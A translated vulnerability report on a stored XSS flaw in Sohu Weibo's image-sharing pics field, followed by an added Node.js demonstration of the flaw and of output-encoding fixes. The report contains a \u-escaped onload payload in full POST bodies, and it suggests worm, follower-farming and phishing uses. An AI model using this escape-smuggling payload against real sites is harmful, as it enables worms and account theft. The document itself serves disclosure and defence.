Vulnerability cause: the backslash (\) is not filtered in the pics field of the POST data.
Vulnerability impact: arbitrary code can be inserted through the pics parameter of images published on Sohu Weibo, which allows large-scale worms, follower farming, phishing and so on.

1. The following is an ordinary POST body for sharing an image:

    msg: share image
    pics: [{"url":"http://s3.t.itc.cn/mblog/pic/20132_11_3/s_pzenz7686783935702.jpg","extraData":{"smallest":{"w":90,"h":120,"size":5010},"small":{"w":160,"h":213,"size":11146},"middle":{"w":312,"h":416,"size":24486},"big":{"w":312,"h":416,"size":24486}}}]

   As you can see, pics is sent in JSON format.

2. I tested \. In JS, \ followed by a character code can represent any character, and it is not filtered here. So I appended the JS-escaped form (as I call it) of "onload="alert(1) after the .jpg in the url parameter. The POST data becomes:

    msg: share image
    pics: [{"url":"http://s3.t.itc.cn/mblog/pic/20132_11_3/s_pzenz7686783935702.jpg\u0022\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0022\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029","extraData":{"smallest":{"w":90,"h":120,"size":5010},"small":{"w":160,"h":213,"size":11146},"middle":{"w":312,"h":416,"size":24486},"big":{"w":312,"h":416,"size":24486}}}]

   ps: gainover's tool can be used to convert the JavaScript code: http://app.baidu.com/app/enter?appid=280383

   The code is inserted successfully, see Figure 1.

3. Then I tested tags such as <iframe> and <script> one by one; every one of them was inserted successfully without difficulty. (To confirm that an insert succeeded, open Chrome's F12 developer tools and tell by the syntax colouring, or copy the response into an external txt file.) Figures 2, 3 and 4 show the inserted tags, <iframe> and <script> among them.
4. As shown above, an attacker can load arbitrary external JS files. Because the POST data carries no key, token or anything similar, a worm is trivial. For the details of exploiting this as a worm and for follower farming, see @imlonghao's post WooYun: stored XSS somewhere on Sohu Weibo; incidentally, the related interface also has no TOKEN.

5. The cookie can be stolen, but Sohu Weibo's cookie is HttpOnly, so it is useless and cannot be accessed (however, the account and password can be obtained with a forged phishing page). It is better to make a worm.

6. Finally, I don't want a gift, I just want enough rank. Don't give me 5 rank and just refresh without replying to anything, because this really does have a huge impact!~

Solution:
Filter \ in the pics parameter.
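The following Node.js script is an added example, not code from the report or from Sohu Weibo. It reproduces the mechanism of steps 2 and 3 and checks the proposed solution: the url value is stored with its \uXXXX escapes intact, so a blocklist looking for raw quotes and angle brackets passes it; when the stored value is later parsed as JS/JSON the escapes turn back into "onload="alert(1), and writing that into an <img> attribute unencoded breaks out of the src attribute. It also shows that rejecting the backslash (the report's fix) does stop this vector, and that HTML-encoding the decoded value at output time stops it regardless of how the characters were escaped on the wire. Only the URL and the escape sequence come from the report; the extractor, the filter names, the rendering functions and the reduced POST bodies are constructed for illustration, and the server and client are stand-ins for whatever Sohu Weibo actually ran.

```javascript
// Added example (not from the report): \u escapes in the pics JSON survive a
// naive input filter and become an attribute injection once decoded by JS.

// Constructed POST bodies, reduced to the url field. The URL and the escape
// sequence are the ones in the report.
const BENIGN_PICS =
  '[{"url":"http://s3.t.itc.cn/mblog/pic/20132_11_3/s_pzenz7686783935702.jpg"}]';
// Same URL followed by "onload="alert(1) written as \uXXXX escapes.
const PAYLOAD_PICS =
  '[{"url":"http://s3.t.itc.cn/mblog/pic/20132_11_3/s_pzenz7686783935702.jpg' +
  '\\u0022\\u006f\\u006e\\u006c\\u006f\\u0061\\u0064\\u003d\\u0022' +
  '\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0031\\u0029"}]';

// Hypothetical server side: pull the url value out of the raw body without
// JSON-decoding it, so backslash escapes stay literal in the stored string.
function extractRawUrl(rawBody) {
  const m = /"url":"((?:[^"\\]|\\.)*)"/.exec(rawBody);
  return m ? m[1] : null;
}

// Hypothetical blocklist that only looks for raw quotes and angle brackets.
// The escaped payload contains none of them, so it passes.
function inputFilterPasses(storedUrl) {
  return !/["<>]/.test(storedUrl);
}

// The report's proposed fix: reject any backslash in the value.
function backslashFilterPasses(storedUrl) {
  return !storedUrl.includes('\\');
}

// Hypothetical client side: the stored value is emitted as a JS/JSON string
// and parsed, which decodes \u0022 -> " and so on. JSON.parse stands in for
// whatever JS parsing the real page did.
function decodeStored(storedUrl) {
  return JSON.parse('"' + storedUrl + '"');
}

// Vulnerable rendering: decoded url dropped straight into an attribute.
function renderVulnerable(storedUrl) {
  return '<img src="' + decodeStored(storedUrl) + '">';
}

// Hardened rendering: encode for the attribute context and restrict the
// scheme, independent of how the input was escaped on the wire.
function escapeAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function isHttpUrl(s) {
  try {
    const u = new URL(s);
    return u.protocol === 'http:' || u.protocol === 'https:';
  } catch (e) {
    return false;
  }
}

function renderHardened(storedUrl) {
  const url = decodeStored(storedUrl);
  if (!isHttpUrl(url)) return '';
  return '<img src="' + escapeAttr(url) + '">';
}

// Demonstration on the constructed bodies.
const stored = extractRawUrl(PAYLOAD_PICS);
console.log('stored value      :', stored);
console.log('naive filter      :', inputFilterPasses(stored) ? 'passes' : 'blocked');
console.log('backslash filter  :', backslashFilterPasses(stored) ? 'passes' : 'blocked');
console.log('decoded by JS     :', decodeStored(stored));
console.log('vulnerable markup :', renderVulnerable(stored));
console.log('hardened markup   :', renderHardened(stored));
```

Rejecting the backslash in pics, as the report proposes, does stop this escape sequence and is a sensible immediate mitigation. The durable fix is to HTML-encode the decoded value at the point where it is written into the attribute and to restrict the scheme, because any other layer that decodes the stored string before rendering would reopen the same hole.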